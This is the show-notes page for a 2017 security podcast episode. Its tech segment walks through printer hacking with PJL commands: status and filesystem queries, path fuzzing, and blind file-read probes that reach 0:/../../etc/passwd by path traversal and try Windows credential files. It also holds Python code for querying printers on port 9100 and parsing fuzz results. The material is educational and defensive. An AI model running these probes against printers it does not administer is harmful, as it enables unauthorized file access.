Episode525

From Paul's Security Weekly

Paul's Security Weekly #525


Recorded August 10, 2017 at G-Unit Studios in Rhode Island!

Hosts

  • Paul Asadoorian
    Embedded device security researcher, security podcaster, and CEO of Active Countermeasures .
  • Larry Pesce
    Senior Managing Consultant and Director of Research at InGuardians, SANS Instructor.
  • Jack Daniel
    Works for Tenable Network Security and Co-Founder of Security BSides.
  • Jeff Man
    Cryptanalyst,
    infosec analyst, pioneering ex-NSA pen tester, PCI specialist & certified security curmudgeon.
    Currently a Sr. InfoSec Consultant for Online Business Systems.
    Interview: Aram Jivanyan, BeSafe - 6:00PM-7:00PM

    Aram is a cryptographer and entrepreneur with a PhD, and the founding CEO of besafe.io, which uses proxy re-encryption techniques to protect user data.

    Tech Segment: Paul's Printer Hacking Adventures - 7:00-7:30PM

    Run PJL Commands:

    printer:/> site @PJL INFO STATUS
    CODE=10001
    DISPLAY="Ready"
    ONLINE=TRUE

    Debug mode shows you the underlying PJL commands the printer shell sends for each action, which is very useful for learning more about PJL and PostScript (PS) attacks:

    192.168.1.197:/> debug
    192.168.1.197:/> Debug mode on
    
    192.168.1.197:/> ls
    192.168.1.197:/> @PJL FSDIRLIST NAME="0:/" ENTRY=1 COUNT=65535
    No data received.
    

    Some printers just don't have a filesystem:

    printer:/> ls
    No data received.
    printer:/> ls ../..
    No data received.
    printer:/> info filesys
    "?"

    The "?" means there is no filesystem inside the firmware, according to the PJL documentation. And yes, I read the PJL documentation; it was awesome, and you should read it too! #RTFMFTW

    You can't launch many "actual" attacks, e.g. capturing print jobs, unless there is a filesystem. You can test for the presence of volumes like this:

    printer:/> info filesys
    VOLUME   TOTAL SIZE      FREE SPACE      LOCATION LABEL    STATUS
    0:       67092416Kbytes  67085856Kbytes                    READ-WRITE
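
The status and filesystem checks above are plain PJL queries over the raw-print port (TCP 9100), so they are easy to script for a fleet inventory: which printers answer PJL at all, which report no filesystem ("?"), and which expose a READ-WRITE volume. The following is an added example written for these notes, not code from the show or from PRET. The sample replies are constructed to mirror the session above (the exact framing a given firmware returns may differ), the `query_printer` helper is a hypothetical name for a one-shot socket exchange, and the UEL/form-feed framing follows the PJL reference.

```python
import socket

# Universal Exit Language sequence: opens a PJL job and, sent again, closes it.
UEL = b"\x1b%-12345X"


def pjl_request(command: str) -> bytes:
    """Build the raw bytes for one PJL query such as "INFO STATUS" or "INFO FILESYS"."""
    return UEL + b"@PJL " + command.encode("ascii") + b"\r\n" + UEL


def parse_info_status(reply: str) -> dict:
    """Turn the KEY=VALUE lines of an @PJL INFO STATUS reply into a dict.

    Quoted values (DISPLAY="Ready") are unquoted; the echoed command line and
    the terminating form feed are ignored.
    """
    fields = {}
    for line in reply.splitlines():
        line = line.strip()
        if line.startswith("@PJL") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        fields[key.strip()] = value.strip().strip('"')
    return fields


def parse_info_filesys(reply: str) -> list:
    """Return the volumes listed by @PJL INFO FILESYS, or [] when the body is "?"
    (no filesystem in the firmware). Each volume records whether it is READ-WRITE.
    """
    volumes = []
    for line in reply.splitlines():
        line = line.strip()
        if not line or line.startswith(("@PJL", "[", "VOLUME")):
            continue
        if line.strip('"') == "?":
            return []
        parts = line.split()
        # Row layout: name, total size, free space, optional location/label, status.
        volumes.append({
            "name": parts[0],
            "total": parts[1],
            "free": parts[2],
            "writable": parts[-1].upper() == "READ-WRITE",
        })
    return volumes


def classify_exposure(reply: str) -> str:
    """One-word verdict for an inventory report: none / read-only / read-write."""
    volumes = parse_info_filesys(reply)
    if not volumes:
        return "none"
    return "read-write" if any(v["writable"] for v in volumes) else "read-only"


def query_printer(host: str, command: str, port: int = 9100, timeout: float = 5.0) -> str:
    """Send one PJL query to a printer you administer and return the decoded reply.

    PJL replies to INFO commands end with a form feed (0x0c), so reading stops
    there; the timeout covers printers that answer nothing at all.
    """
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(pjl_request(command))
        chunks = []
        while True:
            try:
                data = sock.recv(4096)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
            if b"\x0c" in data:
                break
    return b"".join(chunks).decode("ascii", errors="replace")


# Constructed sample replies, shaped after the session above (not captured output).
SAMPLE_STATUS = '@PJL INFO STATUS\r\nCODE=10001\r\nDISPLAY="Ready"\r\nONLINE=TRUE\r\n\x0c'
SAMPLE_NO_FS = '@PJL INFO FILESYS\r\n"?"\r\n\x0c'
SAMPLE_FS = (
    "@PJL INFO FILESYS\r\n[1 TABLE]\r\n"
    "VOLUME TOTAL SIZE FREE SPACE LOCATION LABEL STATUS\r\n"
    "0: 67092416Kbytes 67085856Kbytes READ-WRITE\r\n\x0c"
)

if __name__ == "__main__":
    print(parse_info_status(SAMPLE_STATUS))
    for sample in (SAMPLE_NO_FS, SAMPLE_FS):
        print(classify_exposure(sample), parse_info_filesys(sample))
    # Against a device you administer: print(query_printer("192.0.2.10", "INFO FILESYS"))
```

A printer that classifies as "read-write" is the one worth isolating or hardening first: it is the only kind on which the file-based attacks the notes mention (such as job capture) have something to work with, and an unauthenticated 9100/tcp answer to INFO FILESYS is itself a sign the port should not be reachable from general user VLANs.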


    You can also use the fuzz command:

    printer:/> fuzz path
    Checking base pathes first.
    PATH                                                     EXISTS  DIRLIST
    ────────────────────────────────────────────────────────────────────────
    0:/                                                      True    True   
    Listing directory.
    d        -   PJL
    d        -   PostScript
    d        -   saveDevice
    d        -   webServer
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
                                                             False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    .                                                        False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    \                                                        False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    /                                                        False   False  
    

    You can also fuzz for file names:

    printer:/> fuzz blind
    Blindly trying to read files.
    PATH                                                     GET     EXISTS 
    ────────────────────────────────────────────────────────────────────────
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %WINDIR%\win.ini                                         False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %WINDIR%\repair\sam                                      False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %WINDIR%\repair\system                                   False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %WINDIR%\system32\config\system.sav                      False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %WINDIR%\System32\drivers\etc\hosts                      False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %SYSTEMDRIVE%\boot.ini                                   False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %USERPROFILE%\ntuser.dat                                 False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %SYSTEMDRIVE%\pagefile.sys                               False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %SYSTEMROOT%\repair\sam                                  False   False  
    PJL Error: Vol name out of range
    PJL Error: Vol name out of range
    %SYSTEMROOT%\repair\system                               False   False  
    ────────────────────────────────────────────────────────────────────────
    PJL Error: File not found
    PJL Error: File not found
    0:/.profile                                              False   False  
    PJL Error: File not found
    PJL Error: File not found
    0:/../.profile                                           False   False  
    0:/../../.profile                                        True    True   
    PJL Error: File not found
    PJL Error: File not found
    0:/.../.profile                                          False   False  
    PJL Error: File not found
    PJL Error: File not found
    0:/.../.../.profile                                      False   False  
    PJL Error: File not found
    PJL Error: File not found
    0:/..../.profile                                         False   False  
    PJL Error: File not found
    PJL Error: File not found
    0:/..../..../.profile                                    False   False  
    PJL Error: File not found
    PJL Error: File not found
    0:/etc/passwd                                            False   False  
    PJL Error: File not found
    PJL Error: File not found
    0:/../etc/passwd                                         False   False  
    0:/../../etc/passwd                                      True    True   
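
The two fuzz transcripts above are noisy: every probe that fails prints a pair of "PJL Error" lines, and the interesting result (a path that only exists once you walk `..` above the volume root) is a single True buried among dozens of False rows. The following parser is an added example written for these notes, not part of the show or of PRET; it turns a transcript into one record per probed path, keeps the printer's error text with the row it belongs to, and reads the column names from the table header so it handles both the `fuzz path` (EXISTS/DIRLIST) and `fuzz blind` (GET/EXISTS) layouts. The sample transcripts are trimmed copies of the sessions above.

```python
import re

# A result row: the probed path, then two True/False columns whose names come
# from the table header (EXISTS/DIRLIST for "fuzz path", GET/EXISTS for "fuzz blind").
ROW = re.compile(r"^(?P<path>.*?)\s+(?P<c1>True|False)\s+(?P<c2>True|False)\s*$")
HEADER = re.compile(r"^PATH\s+(?P<c1>\w+)\s+(?P<c2>\w+)\s*$")


def parse_fuzz_output(text: str) -> list:
    """Parse a PRET-style fuzz transcript into one dict per probed path.

    "PJL Error: ..." lines are attached to the result row that follows them,
    so each finding keeps the error message the probe triggered.
    """
    rows, pending_errors = [], []
    col1, col2 = "c1", "c2"  # replaced by the header names once seen
    for line in text.splitlines():
        line = line.rstrip()
        header = HEADER.match(line)
        if header:
            col1, col2 = header.group("c1").lower(), header.group("c2").lower()
            continue
        if line.startswith("PJL Error:"):
            pending_errors.append(line[len("PJL Error:"):].strip())
            continue
        row = ROW.match(line)
        if not row:
            continue  # banner text, rule lines, directory listings
        rows.append({
            "path": row.group("path").strip(),
            col1: row.group("c1") == "True",
            col2: row.group("c2") == "True",
            "errors": pending_errors,
        })
        pending_errors = []
    return rows


def readable_paths(rows: list) -> list:
    """Paths the printer reported as existing."""
    return [r["path"] for r in rows if r.get("exists")]


def traversal_hits(rows: list) -> list:
    """Existing paths reached only by walking '..' above the volume root: the sign
    that the PJL filesystem exposes more than the volume listing suggests."""
    return [p for p in readable_paths(rows) if ".." in p.split("/")]


# Trimmed copies of the two transcripts above, used as sample input.
SAMPLE_PATH = r"""Checking base pathes first.
PATH                                                     EXISTS  DIRLIST
────────────────────────────────────────────────────────────────────────
0:/                                                      True    True
PJL Error: Vol name out of range
PJL Error: Vol name out of range
\                                                        False   False
"""

SAMPLE_BLIND = r"""Blindly trying to read files.
PATH                                                     GET     EXISTS
────────────────────────────────────────────────────────────────────────
PJL Error: Vol name out of range
PJL Error: Vol name out of range
%WINDIR%\win.ini                                         False   False
────────────────────────────────────────────────────────────────────────
PJL Error: File not found
PJL Error: File not found
0:/.profile                                              False   False
0:/../../.profile                                        True    True
PJL Error: File not found
PJL Error: File not found
0:/etc/passwd                                            False   False
0:/../../etc/passwd                                      True    True
"""

if __name__ == "__main__":
    for name, sample in (("path", SAMPLE_PATH), ("blind", SAMPLE_BLIND)):
        rows = parse_fuzz_output(sample)
        print(name, "probed:", len(rows), "readable:", readable_paths(rows),
              "traversal:", traversal_hits(rows))
```

On the blind transcript the parser reports `0:/../../.profile` and `0:/../../etc/passwd` as the two readable paths, both traversal hits; on the path transcript it reports `0:/` as the only existing volume root and no traversal. Keeping the error text per row is also useful for telling "Vol name out of range" (the name was rejected outright) apart from "File not found" (the volume resolved but the file did not), which says something about how the firmware parses paths.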
    

    Resources

    Security News - 7:30-8:30PM

    Paul's Stories

    1. Mystery Company Offers $250,000 Bounty for VM Escape Vulnerabilities
    2. Hacker Marcus Hutchins To Plead Not Guilty To Malware Development
    3. Password Guru Regrets Past Advice
    4. Salesforce Sacks Security Engineers For Their Defcon Talk
    5. .why .its .time .to .fix .localhost
    6. Juniper Issues Security Alert Tied to Routers and Switches
    7. Dropbox Adds an Offline Way to Do Two-Factor Authentication
    8. Patched Flash Player Sandbox Escape Leaked Windows Credentials
    9. BeyondTrust Delivers a Privileged Access Management Platform Available on Google Cloud
    10. Tech Support Scammers Cast a Wider Net
    11. Are You Ready for Your Pen Test?
    12. Automating Defenses Against Assembly-Line Attacks
    13. Microsoft issues out-of-band security updates for Outlook, Office

    Larry's Stories

    1. Sales forced out
    2. CarbonBlack leaking data? ...and their response: https://www.carbonblack.com/2017/08/09/directdefense-incorrectly-asserts-architectural-flaw-in-cb-response/
    3. WiFi Deauther on the cheap
    4. the week of evading MS ATA - Remember back in the day when the week of/month of was a thing?
    5. Malware hidden in synthetic DNA - What the actual fsck.....

    Jeff's Stories

    1. Speaking of Bob and Alice...